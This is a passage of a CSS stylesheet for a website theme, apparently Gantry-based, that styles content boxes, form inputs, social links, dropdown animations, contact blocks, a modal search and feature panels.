.box3.moduletable .button:hover, .box3.widget .button:hover, .box3.g-outer-box .button:hover, .box3 > .g-content .button:hover {
  background: #424242;
}
.box3.moduletable a, .box3.widget a, .box3.g-outer-box a, .box3 > .g-content a {
  color: #dddddd;
}
.box3.moduletable a:hover, .box3.widget a:hover, .box3.g-outer-box a:hover, .box3 > .g-content a:hover {
  color: #d0d0d0;
}
.box4.moduletable, .box4.widget, .box4.g-outer-box, .box4 > .g-content {
  padding: 25px;
  background: #282828;
  color: #ffffff;
}
.box4.moduletable .g-title, .box4.widget .g-title, .box4.g-outer-box .g-title, .box4 > .g-content .g-title {
  color: #ffffff !important;
  border-bottom: 1px solid #424242;
  padding-bottom: 15px;
}
.box4.moduletable .g-title:before, .box4.moduletable .g-title:after, .box4.widget .g-title:before, .box4.widget .g-title:after, .box4.g-outer-box .g-title:before, .box4.g-outer-box .g-title:after, .box4 > .g-content .g-title:before, .box4 > .g-content .g-title:after {
  display: none;
}
.box4.moduletable .g-particle-intro .g-title, .box4.widget .g-particle-intro .g-title, .box4.g-outer-box .g-particle-intro .g-title, .box4 > .g-content .g-particle-intro .g-title {
  margin-bottom: 30px;
}
.box4.moduletable .g-particle-intro .g-title-separator, .box4.widget .g-particle-intro .g-title-separator, .box4.g-outer-box .g-particle-intro .g-title-separator, .box4 > .g-content .g-particle-intro .g-title-separator {
  display: none;
}
.box4.moduletable .button:hover, .box4.widget .button:hover, .box4.g-outer-box .button:hover, .box4 > .g-content .button:hover {
  background: #63b84b;
}
.shadow .g-content {
  box-shadow: 1px 1px 1px rgba(0, 0, 0, 0.1);
}
.shadow2 .g-content {
  box-shadow: 0 0 4px rgba(0, 0, 0, 0.15);
}
.disabled .g-content {
  opacity: 0.4;
}
.square .g-content {
  border-radius: none;
}
.rounded .g-content {
  border-radius: 0;
}
table {
  border: 1px solid #e2e2e2;
}
th {
  background: #eaeaea;
  padding: 0.5rem;
}
td {
  padding: 0.5rem;
  border: 1px solid #e2e2e2;
}
textarea, select[multiple=multiple] {
  background-color: white;
  border: 1px solid #dddddd;
  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.06);
}
textarea:hover, select[multiple=multiple]:hover {
  border-color: #c4c4c4;
}
textarea:focus, select[multiple=multiple]:focus {
  border-color: #4f953b;
}
input[type="color"], input[type="date"], input[type="datetime"], input[type="datetime-local"], input[type="email"], input[type="month"], input[type="number"], input[type="password"], input[type="search"], input[type="tel"], input[type="text"], input[type="time"], input[type="url"], input[type="week"], input:not([type]), textarea {
  background-color: white;
  border: 1px solid #dddddd;
  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.06);
}
input[type="color"]:hover, input[type="date"]:hover, input[type="datetime"]:hover, input[type="datetime-local"]:hover, input[type="email"]:hover, input[type="month"]:hover, input[type="number"]:hover, input[type="password"]:hover, input[type="search"]:hover, input[type="tel"]:hover, input[type="text"]:hover, input[type="time"]:hover, input[type="url"]:hover, input[type="week"]:hover, input:not([type]):hover, textarea:hover {
  border-color: #c4c4c4;
}
input[type="color"]:focus, input[type="date"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="email"]:focus, input[type="month"]:focus, input[type="number"]:focus, input[type="password"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="text"]:focus, input[type="time"]:focus, input[type="url"]:focus, input[type="week"]:focus, input:not([type]):focus, textarea:focus {
  border-color: #4f953b;
}
body.outline-_error h1 {
  margin: 30px 0;
  text-align: center;
}
body.outline-_error .g-offcanvas-toggle:not(.offcanvas-toggle-particle) {
  display: none;
}
.g-social a {
  display: inline-block;
  padding: 8px 10px;
  background: none;
  color: #959595;
  font-size: 0.9rem;
  margin-left: -4px;
  border-right: 1px solid #f0f0f0;
}
.g-social a:first-child {
  border-left: 1px solid #f0f0f0;
  margin-left: 0;
}
.g-social a:hover {
  color: #4f953b;
}
#g-copyright .g-social a {
  padding: 0 10px;
  color: #959595;
  margin: 0;
  border: none;
}
#g-copyright .g-social a:first-child {
  border: none;
}
#g-copyright .g-social a:hover {
  color: #4f953b;
}
#g-copyright .g-block:last-child .g-social {
  margin-right: -10px;
}
@media only all and (max-width: 47.99rem) {
  #g-copyright .g-block:last-child .g-social {
    margin-right: 0;
  }
}
.g-main-nav .g-standard .g-dropdown {
  -webkit-transition: none;
  -moz-transition: none;
  transition: none;
}
.g-main-nav .g-standard .g-fade.g-dropdown {
  -webkit-transition: opacity 0.3s ease-out, -webkit-transform 0.3s ease-out;
  -moz-transition: opacity 0.3s ease-out, -moz-transform 0.3s ease-out;
  transition: opacity 0.3s ease-out, transform 0.3s ease-out;
}
.g-main-nav .g-standard .g-zoom.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-zoom;
  -moz-animation-name: g-dropdown-zoom;
  animation-name: g-dropdown-zoom;
}
.g-main-nav .g-standard .g-fade-in-up.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-fade-in-up;
  -moz-animation-name: g-dropdown-fade-in-up;
  animation-name: g-dropdown-fade-in-up;
}
.g-main-nav .g-fullwidth > .g-dropdown {
  -webkit-transition: none;
  -moz-transition: none;
  transition: none;
}
.g-main-nav .g-fullwidth > .g-fade.g-dropdown {
  -webkit-transition: opacity 0.3s ease-out, -webkit-transform 0.3s ease-out;
  -moz-transition: opacity 0.3s ease-out, -moz-transform 0.3s ease-out;
  transition: opacity 0.3s ease-out, transform 0.3s ease-out;
}
.g-main-nav .g-fullwidth > .g-zoom.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-zoom;
  -moz-animation-name: g-dropdown-zoom;
  animation-name: g-dropdown-zoom;
}
.g-main-nav .g-fullwidth > .g-fade-in-up.g-active {
  -webkit-animation-duration: 0.3s;
  -moz-animation-duration: 0.3s;
  animation-duration: 0.3s;
  -webkit-animation-name: g-dropdown-fade-in-up;
  -moz-animation-name: g-dropdown-fade-in-up;
  animation-name: g-dropdown-fade-in-up;
}
@-webkit-keyframes g-dropdown-zoom {
  0% {
    opacity: 0;
    -webkit-transform: scale3d(0.8, 0.8, 0.8);
  }
  100% {
    opacity: 1;
  }
}
@-moz-keyframes g-dropdown-zoom {
  0% {
    opacity: 0;
    -moz-transform: scale3d(0.8, 0.8, 0.8);
  }
  100% {
    opacity: 1;
  }
}
@keyframes g-dropdown-zoom {
  0% {
    opacity: 0;
    -webkit-transform: scale3d(0.8, 0.8, 0.8);
    -moz-transform: scale3d(0.8, 0.8, 0.8);
    -ms-transform: scale3d(0.8, 0.8, 0.8);
    -o-transform: scale3d(0.8, 0.8, 0.8);
    transform: scale3d(0.8, 0.8, 0.8);
  }
  100% {
    opacity: 1;
  }
}
@-webkit-keyframes g-dropdown-fade-in-up {
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0, 30px, 0);
  }
  100% {
    opacity: 1;
  }
}
@-moz-keyframes g-dropdown-fade-in-up {
  0% {
    opacity: 0;
    -moz-transform: translate3d(0, 30px, 0);
  }
  100% {
    opacity: 1;
  }
}
@keyframes g-dropdown-fade-in-up {
  0% {
    opacity: 0;
    -webkit-transform: translate3d(0, 30px, 0);
    -moz-transform: translate3d(0, 30px, 0);
    -ms-transform: translate3d(0, 30px, 0);
    -o-transform: translate3d(0, 30px, 0);
    transform: translate3d(0, 30px, 0);
  }
  100% {
    opacity: 1;
  }
}
.g-content-array {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-content-array .g-grid {
  margin-bottom: 2.3445rem;
}
.g-content-array .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-content-array .g-grid:last-child .g-block:last-child .g-array-item {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-content-array .g-grid {
    margin-bottom: 0;
  }
}
.g-content-array .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-content-array .g-array-item {
    margin-bottom: 2.3445rem;
  }
}
.g-content-array .g-array-item-image {
  margin: 0 0 15px 0;
}
.g-content-array .g-item-title {
  margin: 0;
}
.g-content-array .g-array-item-details, .g-content-array .g-array-item-text, .g-content-array .g-array-item-read-more {
  margin: 15px 0 0;
}
.g-content-array .g-array-item-details {
  font-size: 90%;
}
.g-content-array .g-array-item-details > span {
  margin-right: 10px;
}
.g-content-array .g-array-item-details i {
  margin-right: 5px;
}
.g-contacts .g-grid {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-contacts .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
.g-contacts .g-contacts-item {
  text-align: left;
}
@media only all and (max-width: 47.99rem) {
  .g-contacts .g-contacts-item {
    margin-left: 0 !important;
    margin-right: 0 !important;
    display: block !important;
  }
  .g-contacts .g-contacts-item:last-child {
    margin-bottom: 0 !important;
  }
}
.g-contacts.vertical .g-contacts-item {
  display: block;
}
.g-contacts.horizontal .g-contacts-item:not(.g-block) {
  display: inline-block;
  margin-right: 35px;
}
.g-contacts.horizontal .g-contacts-item:not(.g-block):last-child {
  margin-right: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-contacts.style1 .g-contacts-item {
    margin-bottom: 7px;
  }
}
.g-contacts.style1 .g-contacts-icon {
  margin-right: 5px;
}
.g-contacts.style1.vertical .g-contacts-item {
  margin-bottom: 7px;
}
.g-contacts.style1.vertical .g-contacts-item:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-contacts.style2 .g-contacts-item {
    margin-bottom: 25px;
  }
  .g-contacts.style2 .g-contacts-item:not(.g-block) .g-contacts-icon {
    margin-top: 0 !important;
  }
}
.g-contacts.style2 .g-contacts-item.g-block {
  align-self: center;
}
.g-contacts.style2.horizontal .g-contacts-item:not(.g-block) .g-contacts-icon {
  margin-top: -5px;
}
.g-contacts.style2 .g-contacts-icon {
  float: left;
  border: 2px solid #dddddd;
  border-radius: 50%;
  font-size: 18px;
  height: 45px;
  line-height: 45px;
  text-align: center;
  width: 45px;
  color: #4f953b;
}
.g-contacts.style2 .g-contacts-icon > span {
  position: relative;
  top: -1px;
}
.g-contacts.style2 .g-title-value-container {
  margin-left: 60px;
}
.g-contacts.style2 .g-contact-title {
  margin-top: -5px;
  margin-bottom: 0;
}
.g-contacts.style2.vertical .g-contacts-item {
  margin-bottom: 25px;
}
.g-contacts.style2.vertical .g-contacts-item:last-child {
  margin-bottom: 0;
}
#g-top .g-contacts .g-contacts-item {
  display: inline-block;
  padding: 11px 15px;
  border-right: 1px solid white;
  margin-left: -4px;
  margin-bottom: 0;
}
#g-top .g-contacts .g-contacts-item:first-child {
  border-left: 1px solid white;
  margin-left: 0;
}
#g-top .g-contacts .g-contacts-item:last-child {
  margin-right: 0;
}
#g-top .g-contacts .g-contacts-item > a {
  color: #959595;
}
#g-offcanvas .g-contacts .g-contacts-item {
  margin-left: 0 !important;
  margin-right: 0 !important;
  display: block !important;
}
#g-offcanvas .g-contacts .g-contacts-item:last-child {
  margin-bottom: 0 !important;
}
#g-offcanvas .g-contacts.style1 .g-contacts-item {
  margin-bottom: 7px;
}
#g-offcanvas .g-contacts.style2 .g-contacts-item {
  margin-bottom: 25px;
}
#g-offcanvas .g-contacts.style2 .g-contacts-item:not(.g-block) .g-contacts-icon {
  margin-top: 0 !important;
}
#g-offcanvas .g-contacts .g-block {
  -webkit-flex-grow: 0;
  -moz-flex-grow: 0;
  flex-grow: 0;
  -ms-flex-positive: 0;
  -webkit-flex-basis: 100%;
  -moz-flex-basis: 100%;
  flex-basis: 100%;
  -ms-flex-preferred-size: 100%;
}
[dir="rtl"] #g-top .g-contacts .g-contacts-item {
  border-right: none;
  border-left: 1px solid white;
}
[dir="rtl"] #g-top .g-contacts .g-contacts-item:first-child {
  border-right: 1px solid white;
}
[dir="rtl"] .g-contacts .g-contacts-item {
  text-align: right;
}
[dir="rtl"] .g-contacts.horizontal .g-contacts-item:not(.g-block) {
  display: inline-block;
  margin-left: 35px;
  margin-right: 0;
}
[dir="rtl"] .g-contacts.horizontal .g-contacts-item:not(.g-block):last-child {
  margin-left: 0;
}
[dir="rtl"] .g-contacts.style1 .g-contacts-icon {
  margin-left: 5px;
  margin-right: 0;
}
[dir="rtl"] .g-contacts.style2 .g-contacts-icon {
  float: right;
}
[dir="rtl"] .g-contacts.style2 .g-title-value-container {
  margin-right: 60px;
  margin-left: 0;
}
.modal-search-container.style1 .uk-modal-dialog {
  text-align: left;
}
.modal-search-container.style1 .uk-modal-dialog .search form {
  margin-bottom: 0;
}
.modal-search-container.style1 .uk-modal-dialog .search input {
  margin-bottom: 0;
  border: none;
  box-shadow: none !important;
  font-size: 2rem;
  color: #959595;
}
.modal-search-container.style1 .uk-modal-dialog .search-form .search-field {
  border: none;
  box-shadow: none !important;
  font-size: 2rem;
  color: #959595;
}
.modal-search-container.style1 .uk-modal-dialog .search-form label {
  margin-bottom: 0;
}
.modal-search-container.style1 .uk-modal-dialog .search-form .search-submit {
  display: none;
}
.modal-search-container.style1 .uk-modal-dialog .search-input {
  border: none;
  box-shadow: none !important;
  font-size: 2rem;
  color: #959595;
}
.modal-search-container.style2 #modal-search {
  background: rgba(0, 0, 0, 0.7);
}
.modal-search-container.style2 #modal-search.uk-open .uk-modal-dialog {
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
}
.modal-search-container.style2 #modal-search.uk-open .uk-close {
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
}
.modal-search-container.style2 #modal-search .uk-modal-dialog {
  padding: 0;
  border-radius: 0;
  width: 455px;
  background: none;
  box-shadow: none;
  -webkit-transform: scale(0);
  -moz-transform: scale(0);
  -ms-transform: scale(0);
  -o-transform: scale(0);
  transform: scale(0);
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search form {
  margin-bottom: 0;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input {
  margin-bottom: 0;
  border: none;
  font-size: 2.3rem;
  width: 455px;
  color: #ffffff;
  text-align: center;
  background: none;
  padding: 20px;
  border-radius: 0;
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input::-webkit-input-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input::-moz-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input:-moz-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input:-ms-input-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search input:focus {
  box-shadow: 0 3px 0 0 white;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field {
  border: none;
  font-size: 2.3rem;
  width: 455px;
  color: #ffffff;
  text-align: center;
  background: none;
  padding: 20px;
  border-radius: 0;
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field::-webkit-input-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field::-moz-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field:-moz-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field:-ms-input-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-field:focus {
  box-shadow: 0 3px 0 0 white;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form label {
  margin-bottom: 0;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-form .search-submit {
  display: none;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input {
  border: none;
  font-size: 2.3rem;
  width: 455px;
  color: #ffffff;
  text-align: center;
  background: none;
  padding: 20px;
  border-radius: 0;
  box-shadow: 0 3px 0 0 rgba(255, 255, 255, 0.3);
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input::-webkit-input-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input::-moz-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input:-moz-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input:-ms-input-placeholder {
  color: #ffffff;
  opacity: 1;
}
.modal-search-container.style2 #modal-search .uk-modal-dialog .search-input:focus {
  box-shadow: 0 3px 0 0 white;
}
.modal-search-container.style2 #modal-search .uk-close {
  color: #ffffff !important;
  opacity: 1;
  font-size: 22px;
  top: 35px;
  right: 35px;
  position: absolute;
  -webkit-transform: scale(0);
  -moz-transform: scale(0);
  -ms-transform: scale(0);
  -o-transform: scale(0);
  transform: scale(0);
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
.modal-search-container.style2 #modal-search .uk-close:hover {
  -webkit-transform: rotate(90deg);
  -moz-transform: rotate(90deg);
  -ms-transform: rotate(90deg);
  -o-transform: rotate(90deg);
  transform: rotate(90deg);
  color: #4f953b !important;
}
.modal-search-container .element-invisible {
  border: 0 none;
  height: 1px;
  margin: 0;
  overflow: hidden;
  padding: 0;
  position: absolute;
  width: 1px;
}
.modal-search-container i {
  opacity: 1 !important;
}
.offcanvas-toggle-particle.g-offcanvas-toggle {
  display: block;
  position: relative;
  top: auto;
  left: auto;
  right: auto;
  color: inherit;
  font-size: inherit;
  line-height: inherit;
  -webkit-transition: color 0.2s;
  -moz-transition: color 0.2s;
  transition: color 0.2s;
}
.offcanvas-toggle-particle i {
  opacity: 1 !important;
}
.g-features-particle, .g-features2-particle {
  margin-left: -0.938rem;
  margin-right: -0.938rem;
}
.g-features-particle .g-grid, .g-features2-particle .g-grid {
  margin-bottom: 2.3445rem;
}
.g-features-particle .g-grid:last-child, .g-features2-particle .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle .g-grid:last-child .g-features-particle-item:last-child, .g-features2-particle .g-grid:last-child .g-features-particle-item:last-child {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle .g-grid, .g-features2-particle .g-grid {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle .g-features-particle-item, .g-features-particle .g-features2-particle-item, .g-features2-particle .g-features-particle-item, .g-features2-particle .g-features2-particle-item {
    margin-bottom: 2.3445rem;
  }
}
.g-features-particle .size-33, .g-features2-particle .size-33 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 33.3333%;
  -moz-flex: 0 33.3333%;
  -ms-flex: 0 33.3333%;
  flex: 0 33.3333%;
  width: 33.3333%;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle .size-33, .g-features2-particle .size-33 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
.g-features-particle .size-16, .g-features2-particle .size-16 {
  -webkit-box-flex: 0;
  -moz-box-flex: 0;
  box-flex: 0;
  -webkit-flex: 0 16.6666%;
  -moz-flex: 0 16.6666%;
  -ms-flex: 0 16.6666%;
  flex: 0 16.6666%;
  width: 16.6666%;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle .size-16, .g-features2-particle .size-16 {
    -webkit-box-flex: 0;
    -moz-box-flex: 0;
    box-flex: 0;
    -webkit-flex: 0 100%;
    -moz-flex: 0 100%;
    -ms-flex: 0 100%;
    flex: 0 100%;
    width: 100%;
  }
}
.g-features-particle .g-content, .g-features2-particle .g-content {
  margin: 0;
  padding-top: 0;
  padding-bottom: 0;
}
.g-features-particle p, .g-features2-particle p {
  margin: 0;
}
.g-features-particle .g-features-particle-button, .g-features-particle .g-features-particle-subs, .g-features2-particle .g-features-particle-button, .g-features2-particle .g-features-particle-subs {
  margin-top: 20px;
}
.g-features-particle {
  text-align: center;
}
.g-features-particle .g-features-particle-title {
  margin-top: 0.75rem;
  margin-bottom: 1rem;
}
.g-features-particle .g-features-particle-title a {
  color: #282828;
}
.g-features-particle .g-features-particle-title a:hover {
  color: #4f953b;
}
.g-features-particle .g-features-particle-icon, .g-features-particle .g-circle-border {
  border-radius: 50%;
  font-size: 2rem;
  height: 100px;
  width: 100px;
  line-height: 100px;
  text-align: center;
  vertical-align: middle;
  margin-bottom: 0.75rem;
  color: #4f953b;
  position: relative;
  display: inline-block;
  -webkit-transition: all 0.2s linear 0s;
  -moz-transition: all 0.2s linear 0s;
  transition: all 0.2s linear 0s;
}
.g-features-particle .g-circle-border {
  background: transparent none repeat scroll 0 0;
  border: 1px solid #dddddd;
  height: 98px;
  width: 98px;
  left: 1px;
  top: 1px;
  z-index: 1;
  position: absolute;
  -webkit-transition-timing-function: cubic-bezier(0.5, -0.7, 0.67, 0.7);
  -moz-transition-timing-function: cubic-bezier(0.5, -0.7, 0.67, 0.7);
  transition-timing-function: cubic-bezier(0.5, -0.7, 0.67, 0.7);
}
.g-features-particle .g-features-particle-image {
  margin-bottom: 0.75rem;
  display: inline-block;
}
.g-features-particle .g-features-particle-item .g-content:hover .g-features-particle-icon {
  color: #ffffff;
  background: #4f953b;
}
.g-features-particle .g-features-particle-item .g-content:hover .g-circle-border {
  border-color: #4f953b;
  -webkit-transform: scale(1.18);
  -moz-transform: scale(1.18);
  -ms-transform: scale(1.18);
  -o-transform: scale(1.18);
  transform: scale(1.18);
  -webkit-transition-timing-function: cubic-bezier(0.4, 0.25, 0.14, 1.73);
  -moz-transition-timing-function: cubic-bezier(0.4, 0.25, 0.14, 1.73);
  transition-timing-function: cubic-bezier(0.4, 0.25, 0.14, 1.73);
}
.g-features-particle.style6 .g-grid {
  margin-bottom: 1.876rem;
}
.g-features-particle.style6 .g-grid .g-block {
  padding: 0 0.938rem;
}
.g-features-particle.style6 .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style6 .g-grid:last-child .g-features-particle-item:last-child {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style6 .g-grid {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style6 .g-features-particle-item {
    margin-bottom: 1.876rem;
  }
}
.g-features-particle.style6 .g-content {
  padding: 3rem 2.5rem;
  background: #ffffff;
  border: 1px solid #dddddd;
}
.g-features-particle.style6 .g-features-particle-icon, .g-features-particle.style6 .g-features-particle-image {
  margin-bottom: 1.25rem;
}
.g-features-particle.style6 .g-features-particle-title {
  margin-bottom: 1.5rem;
}
.g-features-particle.style6 .g-features-particle-button, .g-features-particle.style6 .g-features-particle-subs {
  margin-top: 30px;
}
.g-features-particle.style6 .g-subs-item {
  padding: 10px 0;
  border-bottom: 1px solid #dddddd;
}
.g-features-particle.style6 .g-subs-item:last-child {
  border-bottom: none;
}
.g-features-particle.style7 .g-grid {
  margin-bottom: 1.876rem;
}
.g-features-particle.style7 .g-grid .g-block {
  padding: 0 0.938rem;
}
.g-features-particle.style7 .g-grid:last-child {
  margin-bottom: 0;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style7 .g-grid:last-child .g-features-particle-item:last-child {
    margin-bottom: 0;
  }
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style7 .g-grid {
    margin-bottom: 0;
  }
}
.g-features-particle.style7 .g-features-particle-item {
  margin-top: 40px;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style7 .g-features-particle-item {
    margin-bottom: 1.876rem;
  }
}
.g-features-particle.style7 .g-content {
  padding: 25px;
  background: #ffffff;
  border: 1px solid #dddddd;
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
.g-features-particle.style7 .g-content:hover {
  border-color: #282828;
}
.g-features-particle.style7 .g-content:hover .g-features-particle-icon {
  background: #282828;
}
.g-features-particle.style7 .g-features-particle-item-inner {
  margin-top: -64px;
}
.g-features-particle.style7 .g-features-particle-icon, .g-features-particle.style7 .g-features-particle-image {
  margin-bottom: 1.25rem;
}
.g-features-particle.style7 .g-features-particle-icon .g-circle-border, .g-features-particle.style7 .g-features-particle-image .g-circle-border {
  display: none;
}
.g-features-particle.style7 .g-features-particle-icon {
  width: 75px;
  height: 75px;
  line-height: 75px;
  border-radius: 0;
  background: #4f953b;
  color: #ffffff;
  font-size: 24px;
  -webkit-transition: all 0.3s;
  -moz-transition: all 0.3s;
  transition: all 0.3s;
}
.g-features-particle.style7 .g-features-particle-title {
  margin-bottom: 1rem;
  text-transform: uppercase;
}
.g-features-particle.style7 .g-features-particle-button, .g-features-particle.style7 .g-features-particle-subs {
  margin-top: 30px;
}
.g-features-particle.style7 .g-subs-item {
  padding: 10px 0;
  border-bottom: 1px solid #dddddd;
}
.g-features-particle.style7 .g-subs-item:last-child {
  border-bottom: none;
}
.g-features-particle.style8 {
  margin-left: 0;
  margin-right: 0;
  color: #ffffff;
  text-align: left;
}
.g-features-particle.style8 .g-grid {
  margin-bottom: 0;
}
.g-features-particle.style8 .g-grid:last-child .g-features-particle-item {
  box-shadow: -20px 0 20px -20px rgba(0, 0, 0, 0.07) inset;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style8 .g-grid:last-child .g-features-particle-item {
    box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
  }
}
.g-features-particle.style8 .g-grid:last-child .g-features-particle-item:last-child {
  box-shadow: 0 0 20px -20px rgba(0, 0, 0, 0.07) inset;
}
.g-features-particle.style8 .g-features-particle-item {
  padding: 35px 30px 40px;
  box-shadow: -20px -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
}
.g-features-particle.style8 .g-features-particle-item:nth-child(1) {
  background: #40782f;
}
.g-features-particle.style8 .g-features-particle-item:nth-child(2) {
  background: #478635;
}
.g-features-particle.style8 .g-features-particle-item:nth-child(3) {
  background: #4f953b;
}
.g-features-particle.style8 .g-features-particle-item:nth-child(4) {
  background: #57a441;
}
.g-features-particle.style8 .g-features-particle-item:nth-child(5) {
  background: #5eb247;
}
.g-features-particle.style8 .g-features-particle-item:nth-child(6) {
  background: #6abb53;
}
.g-features-particle.style8 .g-features-particle-item:last-child {
  box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
}
@media only all and (max-width: 47.99rem) {
  .g-features-particle.style8 .g-features-particle-item {
    box-shadow: 0 -20px 20px -20px rgba(0, 0, 0, 0.07) inset;
    margin-bottom: 0;
  }
}
.g-features-particle.style8 .g-features-particle-icon, .g-features-particle.style8 .g-features-particle-image {
  margin-bottom: 10px;
  color: #ffffff;
  border-radius: 0;
  width: auto;
  height: auto;
  line-height: inherit;
  font-size: 40px;
}
.g-features-particle.style8 .g-features-particle-icon .g-circle-border, .g-features-particle.style8 .g-features-particle-image .g-circle-border {
  display: none;
}
.g-features-particle.style8 .g-features-particle-title {
  color: #ffffff !important;
  font-size: 1.35rem;
}
.g-features-particle.style8 .g-features-particle-title a {
  color: #ffffff;
}
.g-features-particle.style8 .g-features-particle-title a:hover {
  text-decoration: underline;
}
.g-features-particle.style8 .g-features-particle-desc, .g-features-particle.style8 .g-features-particle-subs {
  opacity: 0.85;
}
.g-features-particle.style8 .g-features-particle-button {
  margin-top: 25px;
}
.g-features-particle.style8 .g-features-particle-button .button {
  background: none;
  border: 2px solid #ffffff;
  color: #ffffff;
  border-radius: 50px;
  -webkit-transition: all 0.2s;
  -moz-transition: all 0.2s;
  transition: all 0.2s;
}
.g-features-particle.style8 .g-features-particle-button .button:hover {
  background: #282828;
  border-color: #282828;
}
.g-features-particle.style8.pull-up {
  margin-top: -7.5rem;
  position: relative;
  z-index: 4;
}
.g-features2-particle .g-features2-particle-title {
  margin-top: 0;
  margin-bottom: 1rem;
}
.g-features2-particle .g-features2-particle-title a {
  color: #282828;
}
.g-features2-particle .g-features2-particle-title a:hover {
  color: #4f953b;
}
.g-features2-particle .g-features2-particle-icon {
  margin-right: 20px;
  color: #4f953b;
  font-size: 130%;
}
.g-features2-particle .g-features2-particle-image {
  margin-right: 20px;
  display: inline-block;
}
.g-features2-particle.style3 .g-grid .g-block {
  padding: 0 1rem;
}
.g-features2-particle.style3 .g-content {
  padding-top: 1rem;
  padding-bottom: 1rem;
  background: rgba(0, 0, 0, 0.2);
}
.g-features2-particle.style3 .g-content:after {
  content: "";
  width: 0;
  height: 0;
  border-top: 15px solid rgba(0, 0, 0, 0.2);
  border-right: 15px solid transparent;
  position: absolute;
  margin-top: 16px;
  margin-left: -15px;
  z-index: 99;
}
.g-features2-particle.style4 .g-features2-particle-icon {
  float: left;
  font-size: 55px;
  margin-right: 0;
  color: #bbb;
}
.g-features2-particle.style4 .g-features2-particle-image {
  float: left;
  margin: 5px 0 0;
  max-width: 60px;
}
.g-features2-particle.style4 .g-title-desc-container {
  margin-left: 75px;
}
.g-features2-particle.style4 .g-features2-particle-title {
  margin-bottom: 10px;
}
.g-features2-particle.style4 .accent1 .g-features2-particle-icon {
